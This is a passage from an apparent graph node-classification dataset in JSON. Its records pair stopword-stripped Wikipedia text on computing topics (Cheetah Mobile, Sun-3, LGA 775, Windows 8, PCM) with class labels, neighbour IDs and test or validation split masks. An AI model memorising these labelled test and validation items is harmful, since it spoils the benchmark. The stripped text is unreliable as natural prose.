    "text": "Cheetah_Mobile:cheetah mobile cheetah mobile inc chinese mobile internet company headquartered beijing china creator popular global mobile apps 634 million monthly active users jan 2017 company established 2010 merger kingsoft security conew image grew second-largest internet security software provider china according iresearch company located 1st yaojiayuan south rd chaoyang district beijing china 2014 cheetah mobile launched ipo selling 12 million american depositary shares us 14 per share thereby raised us 168 million ipo managed morgan stanley jp morgan chase co. credit suisse group kingsoft tencent major investors cheetah mobile holding 54 18 respectively late 2015 cheetah mobile announced entered global strategic partnership yahoo company incorporated yahoo ’ search native advertising platforms within apps result cheetah mobile stated revenue generated yahoo increased 30 percent daily within first two weeks february 2016 cheetah mobile cubot launched cheetahphone android 6.0 marshmallow based smartphone mwc barcelona spain august 2 2016 cheetah mobile announced acquisition french startup news republic 57 million news republic news aggregator cheetah mobile ad supported products include despite popularity clean master android app reported 2014 ads promoting clean master manipulate android users deceptive tactics browsing websites within app advertising framework april 2014 ferenc lászló nagy sophos labs captured pop-up ads led clean master warning device infected virus july 2014 cheetah mobile encouraged users uninstall google chrome replace cheetah mobile browser clean master clean optimization process practice allowed cheetah mobile gain unfair position marketplace led google crackdown december 2018 cheetah mobile implicated massive click fraud scheme leading google remove two apps play store cheetah mobile denied charges",
    "neighbors": [
      2049,
      7809,
      131,
      1417,
      4374,
      1052,
      156,
      798,
      2721,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      6834,
      4403,
      10166,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      4685,
      5069,
      10574,
      10708,
      2005,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      10209,
      3941,
      11622,
      877,
      4464,
      9713,
      3955,
      6643,
      9341,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 7104,
    "label": 3,
    "text": "Sun-3:sun-3 sun-3 series unix computer workstations servers produced sun microsystems launched september 9 1985 sun-3 series vmebus-based systems similar earlier sun-2 series using motorola 68020 microprocessor combination motorola 68881 floating-point co-processor optional sun 3/50 proprietary sun mmu sun-3 systems supported sunos versions 3.0 4.1.1_u1 also current support netbsd linux models listed approximately chronological order max ram sizes may greater third-party memory board used 1989 coincident launch sparcstation 1 sun launched three new sun-3 models 3/80 3/470 3/480 unlike previous sun-3s use motorola 68030 processor 68882 floating-point unit 68030 integral mmu 68030-based architecture called sun-3x sun 3/260s upgraded sun 3400 cpu boards known sun 3/460s",
    "neighbors": [
      3328,
      9090,
      5251,
      7299,
      9731,
      1801,
      4235,
      1809,
      4241,
      2710,
      1818,
      8863,
      7072,
      9343,
      8994,
      1316,
      10789,
      1707,
      2731,
      5677,
      6187,
      3247,
      6322,
      1461,
      2871,
      823,
      4664,
      4285,
      6464,
      9665,
      6338,
      10436,
      8007,
      1480,
      1611,
      9422,
      2895,
      3919,
      597,
      3285,
      10327,
      10200,
      2269,
      5471,
      4960,
      9955,
      11363,
      7270,
      11626,
      7148,
      9452,
      7022,
      5872,
      5233,
      10224,
      8179,
      11636,
      9333,
      7286,
      631,
      11637,
      11129,
      1788,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 7105,
    "label": 3,
    "text": "LGA_775:lga 775 lga 775 also known socket intel desktop cpu socket lga stands land grid array unlike earlier common cpu sockets predecessor socket 478 lga 775 socket holes instead 775 protruding pins touch contact points underside processor cpu socket unusually long life span lasting 7 years last processors supporting ceased production 2011 socket superseded lga 1156 socket h lga 1366 socket b sockets lga 775 distance four screw holes heatsink 72 mm thus interchangeable ones sockets lga 1156 1155 1150 1151 distance 75 mm prescott cedar mill pentium 4 cores well smithfield presler pentium cores used lga 775 socket july 2006 intel released desktop processor core 2 duo codenamed conroe also uses socket subsequent core 2 quad intel changed socket 478 lga 775 new pin type offers better power distribution processor allowing front-side bus raised 1600 mt/s 't socket derived cancelled tejas core replace prescott core another advantage intel newer architecture motherboard pins rather cpu transferring risk pins bent cpu motherboard cpu pressed place load plate rather human fingers directly installer lifts hinged load plate inserts processor closes load plate top processor pushes locking lever pressure locking lever load plate clamps processor 775 copper contact points firmly onto socket 775 pins ensuring good connection load plate covers edges top surface cpu integrated heat spreader center free make contact cooling device placed top cpu spacing cpu cooler mounting holes 72mm x 72mm examination relevant intel data sheets shows lga 775 used consumer level desktops lga 771 used xeon based intel workstation server class computers appear differ placement indexing notches swap two address pins many pins devoted functions interfacing multiple cpus clearly defined lga 775 specifications information available appear consistent lga 771 considering lga 775 predated lga 771 nearly year half would seem lga 771 adapted lga 775 rather way around fact using adapter allow lga 771 processors used lga 775 motherboards i845gv/ge/i848p/i865g/gv/p/pe/i910gl/i915g/gl/gv/p/pl/i925x/xe/ lakeport 945pl /945p 945g 945gc 945gz 955x 946pl 946gz p broadwater i955x i946 946gz pl 965 i975 q965 p965 g965 q963 i975x bearlake x35 p35 q35 g35 p33 g33 q33 p31 g31 x38 eaglelake x48 p45 p43 g45 g43 g41 b43 q43 q45 sis 649/649fx/655/656/656fx/662/671/671fx/671dx/672 pt800/pm800/pt880/pm880/p4m800/p4m800 pro/pt880 pro/pt880 ultra/pt894/pt894 pro/p4m890/pt890/p4m900 ati radeon xpress 200 ati radeon xpress 1250 ati crossfire xpress 3200 nforce4 ultra nforce4 sli xe nforce4 sli nforce4 sli x16 nforce 570 sli nforce 590 sli nforce 610i nforce 630i nforce 650i ultra nforce 650i sli nforce 680i lt sli nforce 680i sli nforce 730i nforce 740i sli nforce 750i sli nforce 760i sli nforce 780i sli nforce 790i sli geforce 9300 geforce 9400 sources force load plate ensures processor completely level giving cpu upper surface optimal contact heat sink cold-water block fixed onto top cpu carry away heat generated cpu socket also introduces new method connecting heat dissipation interface chip surface motherboard lga 775 heat dissipation interface connected directly motherboard four points compared two connections socket 370 clamshell four-point connection socket 478 done avoid reputed danger heat sinks/fans pre-built computers falling transit lga 775 announced better heat dissipation properties socket 478 designed replace prescott core cpus early incarnations ran much hotter previous northwood-core pentium 4 cpus initially neutralized benefits better heat transfer however modern core 2 processors run much lower temperatures prescott cpus replace lga 775 processors following mechanical maximum load limits exceeded heat sink assembly shipping conditions standard use load limits could crack processor die make unusable transition lga packaging lowered load limits smaller load limits socket 478 processors bigger socket 370 socket 423 socket processors fragile large enough ensure processors crack compatibility quite variable earlier chipsets intel 915 tend support single core netburst pentium 4 celeron cpus fsb 533/800 mt/s intermediate chipsets e.g intel 945 commonly support single core pentium 4-based cpus well dual core pentium processors 945 chipset-based motherboards could given bios upgrade support 65nm core-based cpus chipsets also varies lga 775 cpu support complicated mixture chipset capability voltage regulator limitations bios support example g41 chipset n't support netburst cpus pentium pentium extreme edition pentium 4 celeron",
    "neighbors": [
      3588,
      9611,
      5901,
      5523,
      2455,
      3992,
      3352,
      8855,
      3995,
      4252,
      11417,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      3892,
      4537,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      10715,
      11484,
      9570,
      10468,
      613,
      8552,
      7657,
      1260,
      4717,
      1776,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7106,
    "label": 2,
    "text": "Features_new_to_Windows_8:features new windows 8 transition windows 7 windows 8 introduced number new features across various aspects operating system include greater focus optimizing operating system touchscreen-based devices tablets cloud computing windows 8 introduces new windows runtime winrt platform used create new type application officially known windows store apps commonly called metro-style apps apps run within secure sandbox share data apps common apis winrt com-based api allows use various programming languages code apps including c++ c++/cx c visual basic .net html5 javascript metro-style apps packaged distributed via appx new file format package management unlike desktop applications metro-style apps sideloaded subject licensing conditions windows 8.1 update allows sideloading apps windows 8.1 pro devices joined active directory domain windows 8 two apps may snap side widescreen display allow multi-tasking forming sidebar separates apps windows 8.1 apps continually resized desired width snapped apps may occupy half screen large screens allow four apps snapped upon launching app windows allows user pick snapped view app open term metro-style apps referred metro design language prominently used windows 8 recent microsoft products reports surfaced microsoft employees told stop using term due potential trademark issues unspecified partner microsoft spokesperson however denied reports stated metro-style merely codename new application platform windows 8 introduces apis support near field communication nfc windows 8 devices allowing functionality like launching urls/applications sharing information devices via nfc windows store digital distribution platform built windows 8 manner similar apple app store google play allows distribution purchase apps designed windows 8 developers still able advertise desktop software windows store well ensure secure high quality windows store means distributing winrt-based apps consumer-oriented versions windows 8 windows 8.1 windows store features redesigned interface improved app discovery recommendations offers automatic updates apps windows 8 features redesigned user interface built upon metro design language optimizations touchscreens metro-style apps either run full-screen environment snapped side screen alongside another app desktop snapping requires screen resolution 1366×768 higher windows 8.1 lowers snapping requirement screen resolution 1024x768 users switch apps desktop clicking top left corner swiping left side touchscreen invoke sidebar displays currently opened metro-style apps right-clicking upper left corner provides context menu options switch open apps traditional desktop accessible tile start screen launching desktop app shortcut cycles programs regardless type interface also incorporates taskbar right side screen known charms lowercase accessed app desktop sliding right edge touchscreen compatible trackpad moving mouse cursor one right corners screen pressing charms include search share start devices settings charms start charm invokes dismisses start screen charms invoke context-sensitive sidebars used access app system functionality aforementioned changes involving use hot corners user interface navigation windows 8 fundamentally different compared previous versions windows assist new users operating system microsoft incorporated tutorial appears installation windows 8 also first sign-in new user account visually instructs users move mouse cursor corner screen swipe corners devices touchscreens interact operating system tutorial disabled appear new user accounts windows 8.1 introduces navigation hints instructions displayed first use operating system also includes help support app windows 8.1 aforementioned hotspots upper right upper left corners disabled pressing right-clicking bottom left corner screen opens quick link menu menu contains shortcuts frequently used areas control panel file explorer programs features run search power options task manager windows 8.1 quick link menu includes options shut restart device windows 8.1 update introduced changes facilitate mouse-oriented means switching closing metro-style apps patterned upon mechanics used desktop programs windows user interlace lieu recent apps sidebar computer icons opened apps displayed taskbar desktop programs shortcuts apps also pinned taskbar mouse connected auto-hiding titlebar minimize close buttons displayed within apps mouse moved toward top screen number apps included standard installation windows 8 including mail email client people contact manager messaging im client calendar calendaring app photos image viewer music audio player video video player camera webcam digital camera client skydrive reader e-book reader six apps expose bing services search news finance weather travel sports windows 8.1 adds calculator alarm clock sound recorder reading list food drink health fitness help tips scan file manager integrated skydrive app windows 8 also includes metro-style system component called pc settings exposes small portion control panel settings windows 8.1 improves component include options previously exclusive control panel windows 8.1 update adds additional options pc settings windows 8 introduces new form start menu called start screen resembles home screen windows phone shown place desktop startup start screen serves primary method launching applications consists grid app tiles arranged columnar groups groups arranged without group names app tiles either small taking 1 square large taking 2 squares size also display dynamic content provided corresponding apps notifications slide shows users arrange individual app tiles entire groups additional section start screen called apps accessed via right click mouse upward swipe display installed apps categorized names semantic zoom feature available start screen apps view enables users target specific area group screen start screen uninstall apps directly windows 8.1 makes following changes start screen windows 8.1 reverts two changes featured windows 8 windows 8 removed start button taskbar favor ways invoking start screen windows 8.1 restores button windows 8 also showed start screen upon logon opposed editions windows show desktop windows 8.1 user may choose one see first windows 8.1 update boots desktop default non-tablet devices introduces ability switch taskbar start screen open metro-style app directing mouse cursor toward bottom screen windows 8.1 introduces new slide shutdown option allows users drag partially revealed lock screen image toward bottom screen shut operating system windows 8.1 update introduces visible power button start screen power button appear hardware device types default new account profiles windows 8.1 update also receive four additional tiles pinned start screen pc pc settings documents pictures windows rt pc settings tile added windows 8 searching start screen clicking search charm display search results within full-screen interface unlike previous versions windows searching start menu returned results multiple sources simultaneously windows 8 searches individual categories apps settings files default windows 8 searches apps user begins searching start screen search charm also search categories user interface via keyboard shortcuts pressing opens search charm search apps searches files searches settings search queries also redirected specific categories apps entered searching apps windows 8 display list apps support search charm frequently used apps prioritized users pin individual apps always appear search charm also search directly within apps user redirects entered search query specific app presses within app already open searching files windows 8 highlight words phrases match search query provide suggestions based content properties files appear information files associated programs sizes appear directly beneath filenames user hovers file mouse cursor long presses finger tooltip appear display additional information windows 8.1 searching longer opens full-screen interface results instead displayed metro-style flyout interface windows 8.1 also reinstates unified local search results optionally provide results bing dubbed smart search windows 8.1 bing optionally analyze user search habits return relevant content stored locally internet enabled smart search exposes additional search categories within user interface web images web videos accessed via new keyboard shortcut new full screen hero interface powered bing display aggregated multimedia photos youtube videos songs/albums xbox music content news articles wikipedia entries related search query like predecessor windows 8.1 allows users search setting file categories option search category apps removed interface keyboard shortcut previously associated functionality displays unified search results search charm also longer search within apps directly display list compatible apps search content within apps users must first open app available use search feature within app interface windows 8.1 update enhances bing smart search feature providing support natural language queries detect misspellings display apps settings relevant query example typing get apps windows display shortcut windows store windows 8.1 update also introduces visible search button start screen acts shortcut metro-style flyout interface windows 8 introduces redesigned lock screen interface based metro design language lock screen displays customizable background image current date time notifications apps detailed app status updates two new login methods optimized touch screens also available including four-digit pin picture password users allow use certain gestures performed selected picture log gestures take account shape start end points well direction however shapes gestures limited tapping tracing line circle microsoft found limiting gestures increased speed sign-ins three times compared allowing freeform methods wrong gestures always deny login lock pc five unsuccessful attempts text password provided windows 8.1 introduces ability display photo slide show lock screen feature display images local remote directories includes additional options use photos optimized current screen resolution disable slide show device running battery power display lock screen slide show instead turning screen period user inactivity lock screen also display interactive toast notifications examples users answer calls instant messages received skype contacts dismiss alarm notifications lock screen users also take photos without dismissing lock screen windows 8 introduces new forms notifications metro-style apps certain events file explorer pc settings component includes options globally disable toast notifications app notifications lock screen notification sounds notifications also disabled per-app basis settings charm windows 8 provides additional options suppress toast notifications 1 hour 3 hour 8 hour time intervals windows 8.1 introduces quiet hours feature also available windows phone allows users suppress notifications based time day e.g. notifications disabled 12:00 6:00 pm windows 8 allows users link profiles microsoft account provide additional functionality synchronization user data settings including belonging desktop allows integration microsoft services xbox live xbox music xbox video gaming multimedia skydrive online file storage windows 8 includes improved support multi-monitor configurations taskbar optionally shown multiple displays display also show dedicated taskbar addition options available prevent taskbar buttons appearing certain monitors wallpapers also spanned across multiple displays display separate wallpaper windows 8.1 includes improved support high-resolution monitors desktop scaling feature helps resize items desktop solve visibility problems screens high native resolution windows 8.1 also introduces per-display dpi scaling provides option scale 200 windows explorer renamed file explorer incorporates ribbon toolbar designed bring forward commonly used commands easy access button advances user back level folder hierarchy removed explorer windows xp also restored additionally file explorer features redesigned preview pane takes advantage widescreen layouts file explorer also provides built-in function mounting iso img vhd files virtual drives easier management files folders windows 8 introduces ability move selected files folders via drag drop parent folder subfolder listed within breadcrumb hierarchy address bar file explorer progress windows file operations also redesigned offering ability show multiple operations graph tracking transfer speeds ability pause resume file transfer new interface also introduced managing file name collisions file operation allowing users easily control conflicting files copied libraries introduced windows 7 individual icons changed user interface previously users change icons manually editing configuration files windows 8.1 however longer creates default libraries new users display libraries listing file explorer default instead windows 8.1 introduces shortcuts default user profile folders documents downloads pictures etc within pc location file explorer windows 8 ships internet explorer 10 run either desktop program operates similarly internet explorer 9 app new full-screen interface optimized use touchscreens internet explorer 10 also contains integrated version flash player available full desktop limited form within metro app windows 8.1 ships internet explorer 11 includes tab syncing webgl spdy support along expanded developer tools metro version also adds access favorites split-screen snapping multiple tabs additional option always display address bar tabs also available metro version also detect highlight phone numbers web page turn clickable links clicked initiate call compatible app skype windows 8 includes overhauled version task manager features following changes windows 8 introduces revised virtual also known on-screen keyboard interface optimized touchscreen devices includes wider spacing keys designed prevent common typing errors occur using touchscreens pressing holding key reveals related keys accessed via press swipe suggestions incomplete words available emoji characters also supported windows 8.1 introduces ability swipe space bar desired direction suggested word switch on-screen suggestions windows 8.1 update introduces new gesture allows users tap twice hold second tap drag drop highlighted text objects visible option hide show virtual keyboard also available windows 8 displays peek button password text boxes optionally allows users view passwords entered order ensure typed correctly feature disabled via group policy file history continuous data protection component file history automatically creates incremental backups files stored libraries including users participating homegroup user-specified folders different storage device another internal external hard drive storage space network share specific revisions files tracked restored using history functions file explorer file history replaces backup restore shadow copy known windows explorer previous versions main backup tool windows 8 unlike shadow copy performs block-level tracking files file history utilizes usn journal track changes simply copies revisions files backup location unlike backup restore file history back files encrypted efs windows 8 adds native support usb 3.0 allows faster data transfers improved power management compatible devices native stack includes support newer efficient usb attached scsi uas protocol turned default even usb 2.0 devices although must however supporting firmware/hardware take advantage windows 8.1 enhanced support power saving features usb storage devices addition without problems poorly implemented hardware degrading user experience hangs disconnects support advanced format hard drives without emulation included first time port windows arm architecture also created windows 8 known windows rt specifically optimized mobile devices tablets windows rt able run third-party windows store apps comes preinstalled version office 2013 specially redesigned touchscreen use windows 8.1 improves hardware support directx 11.2 alongside existing winpe-based windows setup used installations initiated booting dvd usb network upgrade assistant offered provide simpler faster process upgrading windows 8 previous versions windows program runs compatibility check scan device hardware software windows 8 compatibility allows user purchase download generate installation media dvd usb flash drive install windows 8 new installation process also allows users transfer user data clean installation windows similar program branded windows 8 setup used installations user already product key windows 8 implements oem activation 3.0 allows microsoft digitally distribute windows licenses original equipment manufacturers oems windows 8 devices store product keys directly firmware rather printed certificate authenticity coa sticker new system designed prevent oem product keys used computers licensed also allows installer automatically detect accept product key event re-installation windows 8.1 update adds new installation mode known wimboot wim image contains windows installation left compressed rather extracted system configured use files directly within system image installation method primarily designed reduce footprint windows installation devices small amounts storage system image also doubles recovery image speeding refresh reset operations supported systems unified extensible firmware interface uefi windows located solid-state drive emmc windows 8 incorporates improved support mobile broadband first-class method internet connectivity upon insertion sim card operating system automatically determine user carrier configure relevant connection settings using access point name database operating system also monitor mobile data usage changes behavior accordingly reduce bandwidth use metered networks carriers also offer dedicated windows store apps account management also installed automatically part connection process functionality demonstrated app could also display monthly data usage statistics live tile windows 8 also reduces need third-party drivers software implement mobile broadband providing generic driver providing integrated airplane mode option windows 8 supports geolocation windows 8.1 adds support nfc printing mobile broadband tethering auto-triggered vpn geofencing windows 8.1 update provides options network settings charm show estimated data usage selected network designate network metered connection windows 8 defaults hybrid boot mode operating system shut hibernates kernel allowing faster boot subsequent startup improvements compounded using processor cores startup default create seamless transition power-on self-test windows startup process manufacturers logos shown windows boot screen compatible systems uefi advanced startup menu uses graphical interface mouse touch support place text-based menu used previous versions increased boot speed devices uefi make difficult access using keyboard shortcuts boot menu launched within windows—using either pc settings app holding shift clicking restart option power menu using new -o switch shutdown.exe though legacy version advanced startup menu still enabled instead uefi firmware exposed windows via class drivers updated firmware capsules distributed update driver signed package inf file security catalog similarly devices driver installed windows prepares update installed next boot windows boot manager renders status information device boot screen windows 8 includes wddm 1.2 directx graphics infrastructure dxgi 1.2 desktop window manager runs times even systems unsupported graphics cards dwm also supports software rendering also includes support stereoscopic 3d content major features include preemptive multitasking finer granularity dma buffer primitive triangle pixel instruction-level reduced memory footprint improved resource sharing improved timeout detection recovery 16-bit color surface formats 565 5551 4444 mandatory windows 8 direct3d 11 video supports yuv 4:4:4/4:2:2/4:2:0/4:1:1 video formats 8 10 16-bit precision well 4 8-bit palettized formats windows 8.1 introduces wddm 1.3 adds support miracast enables wireless wired delivery compressed standard- high-definition video desktops tablets mobile phones devices windows 8 adds support printer driver architecture version 4 adds metro friendly interface well changes way architecture written windows 8.1 adds support wi-fi direct printing nfc printing native apis 3d printing xml-based 3d manufacturing format 3mf windows powershell microsoft task automation framework consisting command-line shell associated scripting language built .net framework powershell provides full access com wmi enabling administrators perform administrative tasks local remote windows systems windows 8 includes windows powershell v3.0 windows 8.1 comes windows powershell v4.0 features host new commands managing start screen windows defender windows components hardware network windows go feature exclusive enterprise version windows 8 allows organization provision bootable usb flash drives windows installation allowing users access managed environment compatible pc windows 8.1 updates feature enable booting usb composite device storage smart card function action center introduced windows 7 expanded include controls notifications new categories smartscreen status drive health status file history device software updates new automatic maintenance feature periodically perform number maintenance tasks diagnostics updates malware scans improve system performance pc settings app windows 8 used interact windows update although traditional interface control panel retained windows 8 able distribute firmware updates compatible devices configured automatically download windows updates metered networks new set windows powershell cmdlets enable adding removing features windows programs features applet control panel deployment image servicing management dism utility windows 8 includes features previously available imagex able periodically check component store corruption repair report amount disk space use winsxs folder also determine cleanup performed windows 8 detect system experiencing issues preventing system functioning correctly automatically launch advanced startup menu access diagnostic repair functions system recovery windows 8 introduced new functions known collectively push-button reset allows user re-install windows without needing use installation media feature consists reset refresh functions accessible within advanced boot options menu pc settings options reboot system windows recovery environment perform requested operation refresh preserves user profiles settings windows store apps reset performs clean installation windows reset function may also perform specialized disk wiping formatting procedures added security operations remove installed desktop applications system users also create custom disk image use refresh reset windows 8 introduces virtual smart card support digital certificate smart card stored onto user machine protected trusted platform module thereby eliminating need user physically insert smart card though entering pin still required virtual smart card support enables new two-factor authentication scenarios windows 8.1 improves functionality simplifying device enrollment process virtual smart cards introduces additional virtual smart card functionality metro-style applications enrollment management features via winrt apis windows 8.1 features pervasive support biometric authentication throughout operating system includes native fingerprint registration feature enables use fingerprint tasks signing device purchasing apps windows store consenting authentication prompts e.g. user account control windows 8.1 also introduces new winrt apis biometrics windows rt logging microsoft account automatically activates passive device encryption feature-limited version bitlocker seamlessly encrypts contents mobile devices protect contents windows 8.1 device encryption similarly available x86-based windows devices automatically encrypting user data soon operating system configured user signs microsoft account supported active directory network recovery key generated saved directly user account unlike bitlocker device encryption x86-based devices requires device meet connected standby specifications among requirements requires device use solid state storage ram soldered directly motherboard trusted platform module tpm 2.0 chip windows 8.1 introduces assigned access formerly called kiosk mode restricts windows device running single predetermined metro-style app windows 8.1 slated include provable pc health feature would allow owners subject devices connected network remote pc analysis provable pc health connected devices would periodically send various configuration-related information cloud service would provide suggestions remediation upon detection issue however feature dropped operating system general availability windows 8 integrates windows live family safety operating system allowing parents restrict user activity via web filtering application restriction computer usage time limits parental controls functionality introduced windows vista previously partially removed windows 7 made part windows live family safety instead notable change family safety administrators specify time periods computer usage example administrator restrict user account remained signed total time period one hour previous versions windows administrators could restrict accounts based time day windows 8 introduced four new features offer security startup process uefi secure boot trusted boot measured boot early launch anti-malware elam four secure boot native feature windows 8 part uefi startup uefi firmware checks validity digital signature present windows boot loader bootmgfw.efi signed microsoft public key signature check happens every time computer booted prevents malware infecting system operating system loads uefi firmware allow signatures keys enrolled database prior windows 8 release microsoft announced certified computers ship microsoft public key enrolled secure boot enabled default however following announcement company accused critics free open-source software advocates including free software foundation trying use secure boot hinder outright prevent installation alternative operating systems linux microsoft denied secure boot requirement intended serve form lock-in clarified x86 certified systems arm systems must allow secure boot enter custom mode disabled trusted boot feature windows boot loader ensures integrity microsoft components loaded memory including elam loads last elam ensures third-party boot drivers trustworthy loaded elam check fails elam use either windows defender third-party compatible antivirus 2011 build conference anaheim california microsoft showed windows 8 machine prevent infected usb flash memory compromising boot process measured boot attest state client machine sending details configuration remote machine feature relies attestation feature trusted platform module designed verify boot integrity client windows platform binary table allows executable files stored within uefi firmware execution startup microsoft states feature meant allow critical software persist even operating system changed reinstalled 'clean configuration specifically anti-theft security software also mis-used including lenovo lenovo service engine feature windows 8 includes updated windows defender antivirus program defends system broad range malware including computer viruses computer worms spyware windows 8.1 augments network inspection system nis network intrusion detection system feature present microsoft security essentials since july 2010 windows 8 includes various features controlled keyboard shortcuts hyper-v native hypervisor previously offered windows server included windows 8 pro replacing windows virtual pc hosted hypervisor storage spaces storage virtualization technology succeeds logical disk manager allows organization physical disks logical volumes similar logical volume manager linux raid1 raid5 higher abstraction level storage space behaves like physical disk user thin provisioning available disk space spaces organized within storage pool i.e collection physical disks span multiple disks different sizes performance technology usb sata sas process adding new disks replacing failed older disks fully automatic controlled powershell commands storage pool host multiple storage spaces storage spaces built-in resiliency disk failures achieved either disk mirroring striping parity across physical disks storage pool refs filesystem limited 4 pb 4096 tb limits total number storage pools number storage spaces within pool review ars technica concluded storage spaces windows 8 good foundation current iteration simply flawed recommend circumstances microsoft mvp helge klein also criticized storage spaces unsuitable touted market soho users storage spaces enhanced windows server 2012 r2 tiering caching support used caching ssd new features added windows 8.1 instead windows 8.1 gained support specific features sshd drives e.g host-hinted lba caching tp_042v14_sata31_hybrid information windows 8.1 also gained support nvm express nvme new industry standard protocol pcie-attached storage pcie flash cards",
    "neighbors": [
      6150,
      9744,
      9745,
      11283,
      537,
      6171,
      4637,
      3102,
      8740,
      3109,
      11301,
      6697,
      1581,
      3122,
      9780,
      2101,
      7739,
      10811,
      582,
      1098,
      4178,
      8798,
      4194,
      10338,
      8296,
      5225,
      8299,
      7796,
      5749,
      6265,
      8315,
      1659,
      636,
      639,
      641,
      651,
      6797,
      10896,
      9874,
      2196,
      10900,
      10392,
      9377,
      2213,
      3250,
      5300,
      9910,
      7354,
      9420,
      10957,
      7375,
      2777,
      3289,
      4316,
      8413,
      9448,
      9964,
      10989,
      3841,
      4353,
      9987,
      8976,
      6441,
      3890,
      6462,
      321,
      11605,
      4438,
      2391,
      7515,
      11103,
      9063,
      2919,
      4458,
      4972,
      8046,
      2943,
      8576,
      3462,
      3463,
      1417,
      8080,
      10130,
      4505,
      929,
      4515,
      3496,
      430,
      9655,
      1978,
      7615,
      1990,
      9173,
      9694,
      479,
      5600,
      6114,
      4074,
      5103,
      499,
      2041
    ],
    "mask": "None"
  },
  {
    "node_id": 7107,
    "label": 4,
    "text": "National_Cyber_Security_Hall_of_Fame:national cyber security hall fame national cyber security hall fame founded larry letow rick geritz established 2012 recognize contributions key individuals field cyber security mission statement respect past protect future according website designed honor innovative individuals organizations vision leadership create fundamental building blocks cyber security industry organization also highlights major milestones industry 40-year history timeline representation includes inductees corresponding accomplishments nominations cyber security hall fame submitted following categories reviewed advisory committee chaired 2013 mike jacobs 2019 members cyber security hall fame advisory board",
    "neighbors": [
      1312,
      3361,
      8865,
      1059,
      8283,
      4049,
      6005,
      8155,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7108,
    "label": 5,
    "text": "Pulse-code_modulation:pulse-code modulation pulse-code modulation pcm method used digitally represent sampled analog signals standard form digital audio computers compact discs digital telephony digital audio applications pcm stream amplitude analog signal sampled regularly uniform intervals sample quantized nearest value within range digital steps linear pulse-code modulation lpcm specific type pcm quantization levels linearly uniform contrast pcm encodings quantization levels vary function amplitude a-law algorithm μ-law algorithm though pcm general term often used describe data encoded lpcm pcm stream two basic properties determine stream fidelity original analog signal sampling rate number times per second samples taken bit depth determines number possible digital values used represent sample early electrical communications started sample signals order multiplex samples multiple telegraphy sources convey single telegraph cable american inventor moses g. farmer conveyed telegraph time-division multiplexing tdm early 1853 electrical engineer w. m. miner 1903 used electro-mechanical commutator time-division multiplexing multiple telegraph signals also applied technology telephony obtained intelligible speech channels sampled rate 3500–4300 hz lower rates proved unsatisfactory 1920 bartlane cable picture transmission system used telegraph signaling characters punched paper tape send samples images quantized 5 levels 1926 paul m. rainey western electric patented facsimile machine transmitted signal using 5-bit pcm encoded opto-mechanical analog-to-digital converter machine go production british engineer alec reeves unaware previous work conceived use pcm voice communication 1937 working international telephone telegraph france described theory advantages practical application resulted reeves filed french patent 1938 us patent granted 1943 time reeves started working telecommunications research establishment first transmission speech digital techniques sigsaly encryption equipment conveyed high-level allied communications world war ii 1943 bell labs researchers designed sigsaly system became aware use pcm binary coding already proposed reeves 1949 canadian navy datar system ferranti canada built working pcm radio system able transmit digitized radar data long distances pcm late 1940s early 1950s used cathode-ray plate electrode encoding perforations oscilloscope beam swept horizontally sample rate vertical deflection controlled input analog signal causing beam pass higher lower portions perforated plate plate collected passed beam producing current variations binary code one bit time rather natural binary grid goodall later tube perforated produce glitch-free gray code produced bits simultaneously using fan beam instead scanning beam united states national inventors hall fame honored bernard m. oliver claude shannon inventors pcm described communication system employing pulse code modulation filed 1946 1952 granted 1956 another patent title filed john r. pierce 1945 issued 1948 three published philosophy pcm 1948 t-carrier system introduced 1961 uses two twisted-pair transmission lines carry 24 pcm telephone calls sampled 8 khz 8-bit resolution development improved capacity call quality compared previous frequency-division multiplexing schemes 1967 first pcm recorder developed nhk research facilities japan 30 khz 12-bit device used compander similar dbx noise reduction extend dynamic range stored signals video tape recorder 1969 nhk expanded system capabilities 2-channel stereo 32 khz 13-bit resolution january 1971 using nhk pcm recording system engineers denon recorded first commercial digital recordings 1972 denon unveiled first 8-channel digital recorder dn-023r used 4-head open reel broadcast video tape recorder record 47.25 khz 13-bit pcm audio 1977 denon developed portable pcm recording system dn-034r like dn-023r recorded 8 channels 47.25 khz used 14-bits emphasis making equivalent 15.5 bits 1973 adaptive differential pulse-code modulation adpcm developed p. cummiskey nikil jayant james l. flanagan compact disc cd brought pcm consumer audio applications introduction 1982 cd uses 44,100 hz sampling frequency 16-bit resolution stores 80 minutes stereo audio per disc pcm method encoding typically used uncompressed digital audio diagram sine wave red curve sampled quantized pcm sine wave sampled regular intervals shown vertical lines sample one available values y-axis chosen pcm process commonly implemented single integrated circuit called analog-to-digital converter adc produces fully discrete representation input signal blue points easily encoded digital data storage manipulation several pcm streams could also multiplexed larger aggregate data stream generally transmission multiple streams single physical link one technique called time-division multiplexing tdm widely used notably modern public telephone system electronics involved producing accurate analog signal discrete data similar used generating digital signal devices digital-to-analog converters dacs produce voltage current depending type represents value presented digital inputs output would generally filtered amplified use recover original signal sampled data demodulator apply procedure modulation reverse sampling period demodulator reads next value transitions output signal new value result transitions signal gains significant amount high-frequency energy due aliasing effects remove undesirable frequencies demodulator passes signal reconstruction filter suppress energy outside expected frequency range greater nyquist frequency formula_1 common sample depths lpcm 8 16 20 24 bits per sample lpcm encodes single sound channel support multichannel audio depends file format relies synchronization multiple lpcm streams two channels stereo common format systems support 8 audio channels 7.1 surround common sampling frequencies 48 khz used dvd format videos 44.1 khz used compact discs sampling frequencies 96 khz 192 khz used equipment benefits debated nyquist–shannon sampling theorem shows pcm devices operate without introducing distortions within designed frequency bands provide sampling frequency least twice highest frequency contained input signal example telephony usable voice frequency band ranges approximately 300 hz 3400 hz effective reconstruction voice signal telephony applications therefore typically uses 8000 hz sampling frequency twice highest usable voice frequency regardless potential sources impairment implicit pcm system forms pcm combine signal processing coding older versions systems applied processing analog domain part analog-to-digital process newer implementations digital domain simple techniques largely rendered obsolete modern transform-based audio compression techniques telephony standard audio signal single phone call encoded 8,000 samples per second 8 